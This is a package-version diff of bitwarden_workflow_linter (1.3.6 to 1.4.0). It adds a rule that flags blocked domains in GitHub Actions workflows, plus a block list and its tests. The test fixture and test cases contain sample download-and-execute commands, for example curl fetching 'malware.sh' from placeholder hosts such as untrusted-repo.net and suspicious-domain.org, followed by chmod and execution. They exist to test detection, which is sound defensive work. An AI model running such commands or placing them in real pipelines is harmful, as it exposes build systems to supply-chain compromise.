PyPI - bitwarden_workflow_linter - Versions diffs - 1.3.6__tar.gz → 1.4.0__tar.gz - Mend

bitwarden_workflow_linter 1.3.6tar.gz → 1.4.0tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (97) hide show

{bitwarden_workflow_linter-1.3.6 → bitwarden_workflow_linter-1.4.0}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: bitwarden_workflow_linter
-Version: 1.3.6
+Version: 1.4.0
 Summary: Custom GitHub Action Workflow Linter
 Project-URL: Homepage, https://github.com/bitwarden/workflow-linter
 Project-URL: Issues, https://github.com/bitwarden/workflow-linter/issues

{bitwarden_workflow_linter-1.3.6 → bitwarden_workflow_linter-1.4.0}/settings.yaml RENAMED Viewed

@@ -19,6 +19,12 @@ enabled_rules:
       level: error
     - id: bitwarden_workflow_linter.rules.permissions_exist.RulePermissionsExist
       level: error
+    - id: bitwarden_workflow_linter.rules.check_blocked_domains.RuleCheckBlockedDomains
+      level: warning
 approved_actions_path: default_actions.json
 default_branch: main
+# List of domains that should trigger an error if found in workflows
+blocked_domains:
+  - ghrc.io

{bitwarden_workflow_linter-1.3.6 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/__about__.py RENAMED Viewed

@@ -1,3 +1,3 @@
 """Metadata for Workflow Linter."""
-__version__ = "1.3.6"
+__version__ = "1.4.0"

{bitwarden_workflow_linter-1.3.6 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/default_settings.yaml RENAMED Viewed

@@ -19,6 +19,12 @@ enabled_rules:
       level: error
     - id: bitwarden_workflow_linter.rules.permissions_exist.RulePermissionsExist
       level: error
+    - id: bitwarden_workflow_linter.rules.check_blocked_domains.RuleCheckBlockedDomains
+      level: warning
 approved_actions_path: default_actions.json
 default_branch: main
+# List of domains that should trigger an error if found in workflows
+blocked_domains:
+  - ghrc.io

bitwarden_workflow_linter-1.4.0/src/bitwarden_workflow_linter/rules/check_blocked_domains.py ADDED Viewed

@@ -0,0 +1,180 @@
+"""A Rule to check for blocked/malicious domains in workflow content."""
+import re
+from typing import List, Optional, Tuple, Union
+from ..models.job import Job
+from ..models.step import Step
+from ..models.workflow import Workflow
+from ..rule import Rule
+from ..utils import LintLevels, Settings
+class RuleCheckBlockedDomains(Rule):
+    """Rule to detect blocked or malicious domains in workflow content.
+    This rule scans workflow content (URLs, scripts, commands) for domains
+    that have been flagged as blocked or potentially malicious. It helps
+    prevent supply chain attacks and unauthorized external dependencies.
+    """
+    def __init__(self, settings: Optional[Settings] = None, lint_level: Optional[LintLevels] = LintLevels.ERROR) -> None:
+        """Constructor for RuleCheckBlockedDomains.
+        Args:
+          settings:
+            A Settings object that contains any default, overridden, or custom settings
+            required anywhere in the application.
+          lint_level:
+            The LintLevels enum value to determine the severity of the rule.
+        """
+        self.on_fail = lint_level
+        self.compatibility = [Workflow, Job, Step]
+        self.settings = settings
+        # Get blocked domains from settings, use defaults if none provided
+        self.blocked_domains = settings.blocked_domains if settings else []
+    def extract_domains_from_text(self, text: str) -> List[str]:
+        """Extract domain names from text content.
+        Args:
+            text: The text to scan for domains
+        Returns:
+            List of domain names found in the text
+        """
+        if not text:
+            return []
+        # Pattern to match domain names in various contexts
+        # Breaking down the regex:
+        # (?:https?://)?           - Optional protocol (http:// or https://)
+        # (?:www\.)?               - Optional www. prefix
+        # ([a-zA-Z0-9]             - Start of capturing group: first character (alphanumeric)
+        #   (?:[a-zA-Z0-9-]{0,61}  - Non-capturing group: 0-61 alphanumeric or hyphen chars
+        #   [a-zA-Z0-9])?          - End with alphanumeric (ensures no trailing hyphen)
+        # \.)+                     - Followed by dot, repeated (for subdomains)
+        # [a-zA-Z]{2,}             - Top-level domain (2+ letters)
+        # (?:/[^\s]*)?             - Optional path (slash followed by non-whitespace chars)
+        domain_pattern = r'(?:https?://)?(?:www\.)?([a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}(?:/[^\s]*)?'
+        domains = set()
+        # Find all matches and extract the domain part
+        for match in re.finditer(domain_pattern, text, re.IGNORECASE):
+            full_match = match.group(0)
+            # Clean up the domain (remove protocol, www, path)
+            domain = re.sub(r'^https?://', '', full_match)
+            domain = re.sub(r'^www\.', '', domain)
+            domain = re.sub(r'/.*$', '', domain)  # Remove path
+            domain = domain.lower().strip()
+            if domain and '.' in domain:
+                domains.add(domain)
+        return list(domains)
+    def check_blocked_domains(self, text: str) -> Tuple[bool, List[str]]:
+        """Check if text contains any blocked domains.
+        Args:
+            text: The text to check for blocked domains
+        Returns:
+            Tuple of (is_clean, list_of_found_blocked_domains)
+        """
+        if not text:
+            return True, []
+        domains = self.extract_domains_from_text(text)
+        blocked_found = []
+        for domain in domains:
+            for blocked_domain in self.blocked_domains:
+                blocked_domain_lc = blocked_domain.lower().strip()
+                domain_lc = domain.lower().strip()
+                # Check for exact match or subdomain match
+                if domain_lc == blocked_domain_lc or domain_lc.endswith('.' + blocked_domain_lc):
+                    blocked_found.append(domain)
+        return len(blocked_found) == 0, blocked_found
+    def fn(self, obj: Union[Workflow, Job, Step]) -> Tuple[bool, str]:
+        """Check the workflow object for blocked domains.
+        Args:
+          obj: The workflow object (Workflow, Job, or Step) to check
+        Returns:
+          Tuple of (success, error_message)
+        """
+        blocked_domains_found = []
+        if isinstance(obj, Workflow):
+            # Check workflow-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"workflow name", domain) for domain in domains])
+        elif isinstance(obj, Job):
+            # Check job-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"job name", domain) for domain in domains])
+            if obj.uses:
+                is_clean, domains = self.check_blocked_domains(obj.uses)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"job uses", domain) for domain in domains])
+            # Check environment variables
+            if obj.env:
+                for key, value in obj.env.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"job env '{key}'", domain) for domain in domains])
+        elif isinstance(obj, Step):
+            # Check step-level content
+            if obj.name:
+                is_clean, domains = self.check_blocked_domains(obj.name)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step name", domain) for domain in domains])
+            if obj.uses:
+                is_clean, domains = self.check_blocked_domains(obj.uses)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step uses", domain) for domain in domains])
+            if obj.run:
+                is_clean, domains = self.check_blocked_domains(obj.run)
+                if not is_clean:
+                    blocked_domains_found.extend([(f"step run command", domain) for domain in domains])
+            # Check environment variables
+            if obj.env:
+                for key, value in obj.env.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"step env '{key}'", domain) for domain in domains])
+            # Check step with parameters
+            if obj.uses_with:
+                for key, value in obj.uses_with.items():
+                    if isinstance(value, str):
+                        is_clean, domains = self.check_blocked_domains(value)
+                        if not is_clean:
+                            blocked_domains_found.extend([(f"step with '{key}'", domain) for domain in domains])
+        if blocked_domains_found:
+            error_details = []
+            for location, domain in blocked_domains_found:
+                error_details.append(f"Found blocked domain '{domain}' in {location}")
+            return False, "; ".join(error_details)
+        return True, ""

{bitwarden_workflow_linter-1.3.6 → bitwarden_workflow_linter-1.4.0}/src/bitwarden_workflow_linter/utils.py RENAMED Viewed

@@ -114,6 +114,7 @@ class Settings:
     approved_actions: dict[str, Action]
     actionlint_version: str
     default_branch: Optional[str]
+    blocked_domains: Optional[list[str]]
     def __init__(
         self,
@@ -121,6 +122,7 @@ class Settings:
         approved_actions: Optional[dict[str, dict[str, str]]] = None,
         actionlint_version: Optional[str] = None,
         default_branch: Optional[str] = None,
+        blocked_domains: Optional[list[str]] = None,
     ) -> None:
         """Settings object that can be overridden in settings.py.
@@ -147,6 +149,7 @@ class Settings:
             name: Action(**action) for name, action in approved_actions.items()
         }
         self.default_branch = default_branch
+        self.blocked_domains = blocked_domains or []
     @staticmethod
     def factory() -> SettingsFromFactory:
@@ -201,4 +204,5 @@ class Settings:
             approved_actions=settings["approved_actions"],
             actionlint_version=actionlint_version,
             default_branch=default_branch,
+            blocked_domains=settings.get("blocked_domains", []),
         )

bitwarden_workflow_linter-1.4.0/tests/fixtures/test-blocked-domains.yml ADDED Viewed

@@ -0,0 +1,34 @@
+name: Test Blocked Domains
+on:
+  push:
+  pull_request:
+jobs:
+  clean-job:
+    name: Clean Job
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+      - name: Run safe command
+        run: echo "This is safe"
+  job-with-blocked-domain:
+    name: Job with malicious-example.com reference
+    runs-on: ubuntu-latest
+    env:
+      DOWNLOAD_URL: https://suspicious-domain.org/config.json
+    steps:
+      - name: Download from blocked domain
+        run: |
+          curl -o script.sh https://untrusted-repo.net/malware.sh
+          chmod +x script.sh
+      - name: Use blocked action
+        uses: bad-actor.io/malicious-action@v1
+        with:
+          config_url: https://malicious-example.com/config
+          backup_server: untrusted-repo.net/backup
+        env:
+          API_ENDPOINT: https://suspicious-domain.org/api

bitwarden_workflow_linter-1.4.0/tests/rules/test_check_blocked_domains.py ADDED Viewed

@@ -0,0 +1,316 @@
+"""Test src/bitwarden_workflow_linter/rules/check_blocked_domains.py."""
+import pytest
+from ruamel.yaml import YAML
+from src.bitwarden_workflow_linter.load import WorkflowBuilder
+from src.bitwarden_workflow_linter.models.job import Job
+from src.bitwarden_workflow_linter.models.step import Step
+from src.bitwarden_workflow_linter.models.workflow import Workflow
+from src.bitwarden_workflow_linter.rules.check_blocked_domains import RuleCheckBlockedDomains
+from src.bitwarden_workflow_linter.utils import Settings, LintLevels
+yaml = YAML()
+@pytest.fixture(name="settings")
+def fixture_settings():
+    return Settings(
+        blocked_domains=[
+            'malicious-example.com',
+            'suspicious-domain.org',
+            'untrusted-repo.net',
+            'bad-actor.io'
+        ]
+    )
+@pytest.fixture(name="rule")
+def fixture_rule(settings):
+    return RuleCheckBlockedDomains(settings=settings)
+class TestRuleCheckBlockedDomains:
+    """Test the RuleCheckBlockedDomains rule."""
+    def test_extract_domains_from_text(self, rule):
+        """Test domain extraction from various text formats."""
+        test_cases = [
+            ("https://example.com/path", ["example.com"]),
+            ("http://www.test.org", ["test.org"]),
+            ("Visit malicious-example.com for info", ["malicious-example.com"]),
+            ("Download from https://suspicious-domain.org/file.zip", ["suspicious-domain.org"]),
+            ("No domains here", []),
+            ("", []),
+            ("Multiple: example.com and test.org", ["example.com", "test.org"]),
+        ]
+        for text, expected in test_cases:
+            domains = rule.extract_domains_from_text(text)
+            # Sort both lists for comparison since order doesn't matter
+            assert sorted(domains) == sorted(expected), f"Failed for text: '{text}'"
+    def test_check_blocked_domains_clean_text(self, rule):
+        """Test checking text with no blocked domains."""
+        clean_texts = [
+            "https://github.com/bitwarden/workflow-linter",
+            "Download from npm registry",
+            "Visit our documentation at docs.bitwarden.com",
+            ""
+        ]
+        for text in clean_texts:
+            is_clean, blocked = rule.check_blocked_domains(text)
+            assert is_clean, f"Text should be clean: '{text}'"
+            assert len(blocked) == 0
+    def test_check_blocked_domains_with_blocked(self, rule):
+        """Test checking text with blocked domains."""
+        blocked_texts = [
+            ("https://malicious-example.com/download", ["malicious-example.com"]),
+            ("Visit suspicious-domain.org", ["suspicious-domain.org"]),
+            ("curl https://untrusted-repo.net/script.sh", ["untrusted-repo.net"]),
+            ("Multiple: malicious-example.com and suspicious-domain.org",
+             ["malicious-example.com", "suspicious-domain.org"])
+        ]
+        for text, expected_domains in blocked_texts:
+            is_clean, blocked = rule.check_blocked_domains(text)
+            assert not is_clean, f"Text should not be clean: '{text}'"
+            assert len(blocked) > 0
+            # Check that all expected domains are found
+            for domain in expected_domains:
+                assert domain in blocked, f"Expected domain '{domain}' not found in {blocked}"
+    def test_workflow_level_check_clean(self, rule):
+        """Test workflow-level checking with clean content."""
+        workflow_yaml = """
+        name: Clean Workflow
+        on:
+          push:
+        jobs:
+          test:
+            runs-on: ubuntu-latest
+            steps:
+              - name: Checkout
+                uses: actions/checkout@v4
+        """
+        workflow_data = yaml.load(workflow_yaml)
+        workflow = Workflow.init("", "test.yml", workflow_data)
+        success, message = rule.fn(workflow)
+        assert success, f"Workflow should pass: {message}"
+    def test_workflow_level_check_blocked(self, rule):
+        """Test workflow-level checking with blocked domain."""
+        workflow_yaml = """
+        name: Download from malicious-example.com
+        on:
+          push:
+        jobs:
+          test:
+            runs-on: ubuntu-latest
+            steps:
+              - name: Test
+                run: echo "test"
+        """
+        workflow_data = yaml.load(workflow_yaml)
+        workflow = Workflow.init("", "test.yml", workflow_data)
+        success, message = rule.fn(workflow)
+        assert not success, "Workflow should fail due to blocked domain"
+        assert "malicious-example.com" in message
+        assert "workflow name" in message
+    def test_job_level_check_clean(self, rule):
+        """Test job-level checking with clean content."""
+        job_data = yaml.load("""
+        name: Clean Job
+        runs-on: ubuntu-latest
+        env:
+          API_URL: https://api.github.com
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        job = Job.init("test-job", job_data)
+        success, message = rule.fn(job)
+        assert success, f"Job should pass: {message}"
+    def test_job_level_check_blocked_in_name(self, rule):
+        """Test job-level checking with blocked domain in name."""
+        job_data = yaml.load("""
+        name: Download from suspicious-domain.org
+        runs-on: ubuntu-latest
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        job = Job.init("test-job", job_data)
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in name"
+        assert "suspicious-domain.org" in message
+        assert "job name" in message
+    def test_job_level_check_blocked_in_uses(self, rule):
+        """Test job-level checking with blocked domain in uses."""
+        job_data = yaml.load("""
+        uses: malicious-example.com/action@v1
+        """)
+        job = Job.init("test-job", job_data)
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in uses"
+        assert "malicious-example.com" in message
+        assert "job uses" in message
+    def test_job_level_check_blocked_in_env(self, rule):
+        """Test job-level checking with blocked domain in environment variable."""
+        job_data = yaml.load("""
+        name: Test Job
+        runs-on: ubuntu-latest
+        env:
+          DOWNLOAD_URL: https://untrusted-repo.net/file.zip
+        steps:
+          - name: Test
+            run: echo "test"
+        """)
+        job = Job.init("test-job", job_data)
+        success, message = rule.fn(job)
+        assert not success, "Job should fail due to blocked domain in env"
+        assert "untrusted-repo.net" in message
+        assert "job env 'DOWNLOAD_URL'" in message
+    def test_step_level_check_clean(self, rule):
+        """Test step-level checking with clean content."""
+        step_data = yaml.load("""
+        name: Checkout code
+        uses: actions/checkout@v4
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert success, f"Step should pass: {message}"
+    def test_step_level_check_blocked_in_uses(self, rule):
+        """Test step-level checking with blocked domain in uses."""
+        step_data = yaml.load("""
+        name: Download malicious action
+        uses: malicious-example.com/action@v1
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in uses"
+        assert "malicious-example.com" in message
+        assert "step uses" in message
+    def test_step_level_check_blocked_in_run(self, rule):
+        """Test step-level checking with blocked domain in run command."""
+        step_data = yaml.load("""
+        name: Download script
+        run: |
+          curl -o script.sh https://suspicious-domain.org/malware.sh
+          chmod +x script.sh
+          ./script.sh
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in run"
+        assert "suspicious-domain.org" in message
+        assert "step run command" in message
+    def test_step_level_check_blocked_in_with(self, rule):
+        """Test step-level checking with blocked domain in with parameters."""
+        step_data = yaml.load("""
+        name: Configure action
+        uses: some/action@v1
+        with:
+          config_url: https://untrusted-repo.net/config.json
+          backup_url: https://malicious-example.com/backup
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domains in with"
+        assert ("untrusted-repo.net" in message or "malicious-example.com" in message)
+        assert ("step with" in message)
+    def test_step_level_check_blocked_in_env(self, rule):
+        """Test step-level checking with blocked domain in environment variable."""
+        step_data = yaml.load("""
+        name: Test step with env
+        run: echo "Testing"
+        env:
+          API_ENDPOINT: https://bad-actor.io/api
+          BACKUP_URL: untrusted-repo.net/backup
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to blocked domain in env"
+        assert ("bad-actor.io" in message or "untrusted-repo.net" in message)
+        assert "step env" in message
+    def test_multiple_blocked_domains_in_single_step(self, rule):
+        """Test step with multiple blocked domains."""
+        step_data = yaml.load("""
+        name: Multiple blocked domains
+        run: |
+          curl https://malicious-example.com/file1
+          wget https://suspicious-domain.org/file2
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = rule.fn(step)
+        assert not success, "Step should fail due to multiple blocked domains"
+        assert "malicious-example.com" in message
+        assert "suspicious-domain.org" in message
+    def test_rule_with_custom_blocked_domains(self):
+        """Test rule with custom blocked domains list."""
+        custom_settings = Settings(
+            blocked_domains=['custom-bad.com', 'another-threat.net']
+        )
+        custom_rule = RuleCheckBlockedDomains(settings=custom_settings)
+        step_data = yaml.load("""
+        name: Test custom domains
+        run: curl https://custom-bad.com/script.sh
+        """)
+        step = Step.init(0, "test-job", step_data)
+        success, message = custom_rule.fn(step)
+        assert not success, "Step should fail with custom blocked domain"
+        assert "custom-bad.com" in message
+    def test_rule_compatibility(self, rule):
+        """Test that rule is compatible with all object types."""
+        assert Workflow in rule.compatibility
+        assert Job in rule.compatibility
+        assert Step in rule.compatibility
+    def test_rule_lint_level_configuration(self, settings):
+        """Test rule with different lint levels."""
+        error_rule = RuleCheckBlockedDomains(settings=settings, lint_level=LintLevels.ERROR)
+        warning_rule = RuleCheckBlockedDomains(settings=settings, lint_level=LintLevels.WARNING)
+        assert error_rule.on_fail == LintLevels.ERROR
+        assert warning_rule.on_fail == LintLevels.WARNING